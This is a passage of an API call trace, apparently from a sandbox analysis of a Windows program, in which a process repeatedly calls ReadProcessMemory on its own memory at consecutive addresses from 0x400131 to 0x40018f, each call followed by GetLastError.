lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.540] GetLastError () returned 0x0 [0303.540] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400131, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.541] GetLastError () returned 0x0 [0303.541] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400132, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.541] GetLastError () returned 0x0 [0303.541] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400133, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.541] GetLastError () returned 0x0 [0303.541] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400134, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.541] GetLastError () returned 0x0 [0303.541] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400135, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.541] GetLastError () returned 0x0 [0303.541] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400136, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.541] GetLastError () returned 0x0 [0303.541] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400137, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.541] GetLastError () returned 0x0 [0303.541] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400138, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.541] GetLastError () returned 0x0 [0303.541] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400139, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.541] GetLastError () returned 0x0 [0303.541] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40013a, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.541] GetLastError () returned 0x0 [0303.541] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40013b, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.541] GetLastError () returned 0x0 [0303.541] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40013c, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.541] GetLastError () returned 0x0 [0303.541] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40013d, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.541] GetLastError () returned 0x0 [0303.541] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40013e, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.541] GetLastError () returned 0x0 [0303.541] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40013f, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.541] GetLastError () returned 0x0 [0303.541] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400140, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.541] GetLastError () returned 0x0 [0303.541] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400141, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.541] GetLastError () returned 0x0 [0303.541] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400142, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.541] GetLastError () returned 0x0 [0303.541] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400143, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.541] GetLastError () returned 0x0 [0303.541] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400144, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.541] GetLastError () returned 0x0 [0303.541] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400145, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.541] GetLastError () returned 0x0 [0303.542] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400146, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.542] GetLastError () returned 0x0 [0303.542] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400147, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.542] GetLastError () returned 0x0 [0303.542] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400148, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.542] GetLastError () returned 0x0 [0303.542] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400149, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.542] GetLastError () returned 0x0 [0303.542] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40014a, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.542] GetLastError () returned 0x0 [0303.542] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40014b, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.542] GetLastError () returned 0x0 [0303.542] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40014c, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.542] GetLastError () returned 0x0 [0303.542] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40014d, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.542] GetLastError () returned 0x0 [0303.542] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40014e, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.542] GetLastError () returned 0x0 [0303.542] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40014f, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.542] GetLastError () returned 0x0 [0303.542] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400150, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.542] GetLastError () returned 0x0 [0303.542] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400151, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.542] GetLastError () returned 0x0 [0303.542] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400152, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.542] GetLastError () returned 0x0 [0303.542] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400153, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.542] GetLastError () returned 0x0 [0303.542] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400154, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.542] GetLastError () returned 0x0 [0303.542] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400155, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.542] GetLastError () returned 0x0 [0303.542] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400156, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.542] GetLastError () returned 0x0 [0303.542] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400157, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.542] GetLastError () returned 0x0 [0303.542] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400158, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.542] GetLastError () returned 0x0 [0303.542] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400159, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.616] GetLastError () returned 0x0 [0303.616] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40015a, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.616] GetLastError () returned 0x0 [0303.616] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40015b, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.616] GetLastError () returned 0x0 [0303.616] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40015c, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.616] GetLastError () returned 0x0 [0303.616] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40015d, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.616] GetLastError () returned 0x0 [0303.616] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40015e, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.616] GetLastError () returned 0x0 [0303.616] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40015f, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.616] GetLastError () returned 0x0 [0303.616] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400160, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.616] GetLastError () returned 0x0 [0303.616] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400161, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.616] GetLastError () returned 0x0 [0303.617] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400162, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.617] GetLastError () returned 0x0 [0303.617] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400163, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.617] GetLastError () returned 0x0 [0303.617] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400164, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.617] GetLastError () returned 0x0 [0303.617] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400165, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.617] GetLastError () returned 0x0 [0303.617] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400166, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.617] GetLastError () returned 0x0 [0303.617] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400167, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.617] GetLastError () returned 0x0 [0303.617] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400168, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.617] GetLastError () returned 0x0 [0303.617] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400169, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.617] GetLastError () returned 0x0 [0303.617] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40016a, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.617] GetLastError () returned 0x0 [0303.617] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40016b, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.617] GetLastError () returned 0x0 [0303.617] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40016c, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.617] GetLastError () returned 0x0 [0303.617] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40016d, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.617] GetLastError () returned 0x0 [0303.617] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40016e, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.617] GetLastError () returned 0x0 [0303.617] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40016f, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.617] GetLastError () returned 0x0 [0303.617] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400170, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.617] GetLastError () returned 0x0 [0303.617] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400171, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.617] GetLastError () returned 0x0 [0303.617] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400172, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.617] GetLastError () returned 0x0 [0303.617] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400173, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.617] GetLastError () returned 0x0 [0303.617] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400174, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.617] GetLastError () returned 0x0 [0303.617] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400175, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.617] GetLastError () returned 0x0 [0303.617] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400176, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.617] GetLastError () returned 0x0 [0303.617] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400177, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.617] GetLastError () returned 0x0 [0303.617] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400178, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.617] GetLastError () returned 0x0 [0303.617] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400179, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.618] GetLastError () returned 0x0 [0303.618] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40017a, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.618] GetLastError () returned 0x0 [0303.618] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40017b, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.618] GetLastError () returned 0x0 [0303.618] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40017c, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.618] GetLastError () returned 0x0 [0303.618] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40017d, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.618] GetLastError () returned 0x0 [0303.618] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40017e, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.618] GetLastError () returned 0x0 [0303.618] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40017f, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.618] GetLastError () returned 0x0 [0303.618] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400180, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.618] GetLastError () returned 0x0 [0303.618] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400181, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.618] GetLastError () returned 0x0 [0303.618] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400182, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.618] GetLastError () returned 0x0 [0303.618] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400183, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.618] GetLastError () returned 0x0 [0303.618] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400184, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.618] GetLastError () returned 0x0 [0303.618] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400185, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.618] GetLastError () returned 0x0 [0303.618] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400186, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.618] GetLastError () returned 0x0 [0303.618] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400187, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.618] GetLastError () returned 0x0 [0303.618] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400188, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.618] GetLastError () returned 0x0 [0303.618] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400189, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.618] GetLastError () returned 0x0 [0303.618] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40018a, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.618] GetLastError () returned 0x0 [0303.618] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40018b, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.618] GetLastError () returned 0x0 [0303.618] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40018c, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.618] GetLastError () returned 0x0 [0303.618] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40018d, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.618] GetLastError () returned 0x0 [0303.618] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40018e, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0303.618] GetLastError () returned 0x0 [0303.618] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40018f, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, 